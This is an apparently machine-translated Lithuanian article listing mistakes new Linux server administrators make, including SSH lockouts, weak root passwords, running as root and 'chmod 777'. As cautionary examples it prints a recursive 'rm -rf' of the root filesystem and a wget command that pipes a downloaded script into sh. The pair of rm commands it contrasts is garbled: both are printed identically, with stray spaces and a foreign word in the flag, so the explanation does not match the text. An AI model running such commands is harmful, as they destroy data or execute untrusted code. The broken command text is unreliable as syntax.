„Linux“ komandų eilutė suteikia serverio administratoriams galimybę kontroliuoti savo serverius ir juose saugomus duomenis, tačiau tai mažai trukdo jiems vykdyti destruktyvias komandas su pasekmėmis, kurių negalima anuliuoti. Atsitiktinis duomenų ištrynimas yra tik viena iš klaidų, kurias daro nauji serverių administratoriai.
Klavišų užrakinimas viduje
Serverių administratoriai prisijungia prie serverių naudodami SSH - paslaugą, paprastai veikiančią 22 prievade, suteikdami prisijungimo apvalkalą, per kurį autentifikuoti vartotojai gali vykdyti komandas nuotoliniuose serveriuose. Standartinis saugumo grūdinimo žingsnis yra konfigūruoti SSH priimti ryšius kitame prievade. SSH perkėlimas į daugybę atsitiktinių prievadų riboja žiaurių jėgų atakų poveikį; įsilaužėliai negali bandyti kenkėjiškų prisijungimų, kai negali rasti prievado, kuriame klausosi SSH.
Tačiau administratorius, sukonfigūravęs SSH klausytis kitame prievade ir iš naujo paleidęs SSH serverį, gali pastebėti, kad ne tik įsilaužėliai yra užrakinti. Jei serverio užkarda taip pat nėra perkonfigūruota leisti prisijungti prie naujojo prievado, bandymai prisijungti niekada nepasieks SSH serverio. Administratorius bus užrakintas iš savo serverio ir niekaip negalės išspręsti problemos, išskyrus tai, kad atidarė palaikymo bilietą su savo prieglobos paslaugų teikėju. Jei pakeisite SSH prievadą, būtinai atidarykite naują prievadą savo serverio užkardos konfigūracijoje.
Lengvai atspėjamo slaptažodžio pasirinkimas
Žiaurios jėgos išpuoliai yra spėlionių žaidimas. Užpuolikas bando daugelį naudotojų vardų ir slaptažodžių, kol pasiekia kombinaciją, leidžiančią juos įvesti. Žodyno ataka yra patobulintas metodas, naudojant slaptažodžių sąrašus, dažnai pašalinamus iš nutekintų slaptažodžių duomenų bazių. Užpuolimai prieš šakninę paskyrą yra lengvesni nei prieš kitas paskyras, nes užpuolikas jau žino vartotojo vardą. Jei šakninėje paskyroje yra paprastas slaptažodis, ją galima nulaužti per trumpą laiką.
Yra trys būdai, kaip apsisaugoti nuo žiaurios jėgos ir žodynų atakų prieš root paskyrą.
- Pasirinkite ilgą ir sudėtingą slaptažodį. Paprastus slaptažodžius lengva nulaužti; ilgų ir sudėtingų slaptažodžių neįmanoma.
- Konfigūruokite SSH, kad nebūtų leidžiama prisijungti prie šaknies. Tai yra paprastas konfigūracijos pakeitimas, tačiau įsitikinkite, kad „sudo“ sukonfigūruotas taip, kad jūsų paskyra galėtų padidinti savo teises.
- Vietoje slaptažodžių naudokite raktų autentifikavimą. Pažymėjimais pagrįsti prisijungimai visiškai pašalina grubios jėgos atakų riziką.
Kopijuokite nesuprantamas komandas
„Stack Exchange“, „Server Fault“ ir panašios svetainės yra gelbėjimosi ratas naujiems „Linux“ sistemos administratoriams, tačiau turėtumėte vengti pagundos nukopijuoti ir įklijuoti nesuprantamą apvalkalo komandą. Kuo skiriasi šios dvi komandos?
sudo rm -rf --no-säilitada-root / mnt / mydrive /sudo rm -rf --no-säilitada-root / mnt / mydrive /
Lengva pamatyti, kai jie rodomi kartu, bet ne taip lengva, kai ieškote forumuose ir ieškote komandos ištrinti prijungto tomo turinį. Pirmoji komanda ištrina visus failus iš prijungto disko. Antroji komanda ištrina tuos failus ir viską, kas yra serverio šakninių failų sistemoje. Vienintelis skirtumas yra vieta prieš paskutinį pasvirąjį brūkšnį.
Serverio administratoriai gali susidurti su ilgomis komandomis su vamzdynais, kurie, sakoma, daro vieną, bet visai ką nors kita. Būkite ypač atsargūs su komandomis, kurios atsisiunčia kodą iš interneto.
wget http: // pavyzdys.com / verybadscript -O - | sh -Ši komanda naudoja wget norėdama atsisiųsti scenarijų, kuris yra prijungtas prie apvalkalo ir vykdomas. Norėdami tai paleisti saugiai, turite suprasti, ką daro komanda, ir ką daro atsisiųstas scenarijus, įskaitant bet kokį kodą, kurį atsisiųstas scenarijus gali pats atsisiųsti.
Prisijungimas kaip root
Paprasti vartotojai gali keisti failus tik savo namų aplanke, tačiau mažai ką root vartotojas negali padaryti „Linux“ serveryje. Tai gali paleisti bet kokią programinę įrangą, nuskaityti bet kokius duomenis ir ištrinti bet kokį failą.
Šakninio vartotojo valdomos programos turi panašią galią. Patogu būti prisijungus kaip root vartotojui, nes jums nereikia nuolat „sudo“ ar „su“, bet tai pavojinga. Klaida gali sugadinti jūsų serverį per kelias sekundes. Buggy programinė įranga, kurią valdo pagrindinis vartotojas, gali sukelti katastrofą. Jei norite atlikti kasdienes operacijas, prisijunkite kaip paprastas vartotojas ir pasinaudokite pagrindinėmis teisėmis tik prireikus.
Nežinote failų sistemos leidimų
Failų sistemos leidimai gali būti painūs ir varginantys naujus „Linux“ vartotojus. Leidimų eilutė, pvz., „Drwxr-xr-x“, iš pradžių atrodo beprasmė, o leidimai gali sustabdyti failų modifikavimą ir sustabdyti programinę įrangą daryti tai, ko norite.
Sistemos administratoriai greitai sužino, kad „chmod 777“ yra stebuklingas užkalbėjimas, kuris išsprendžia daugumą šių problemų, tačiau tai yra baisi idėja. Tai leidžia visiems, turintiems paskyrą, skaityti, rašyti ir vykdyti failą. Jei vykdote šią komandą žiniatinklio serverio kataloge, prašote būti nulaužtas. „Linux“ failų leidimai atrodo sudėtingi, tačiau jei užtruksite kelias minutes, kad sužinotumėte, kaip jie veikia, atrasite logišką ir lanksčią sistemą, pagal kurią kontroliuojamas failų prieiga.
Laikmetyje, kuris vertina paprastą vartotojo patirtį, palyginti su visais kitais veiksniais, „Linux“ komandinė eilutė išlieka ryžtingai sudėtinga ir atspari supaprastinimui. Jūs negalite suklaidinti ir tikėtis, kad viskas bus gerai. Tai nebus gerai, ir jūs pateksite į nelaimę ant rankų.
Bet jei sužinosite pagrindus - failų teises, komandų eilutės įrankius ir jų parinktis, geriausią saugumo praktiką - galite tapti vienos iš galingiausių kada nors sukurtų skaičiavimo platformų meistru.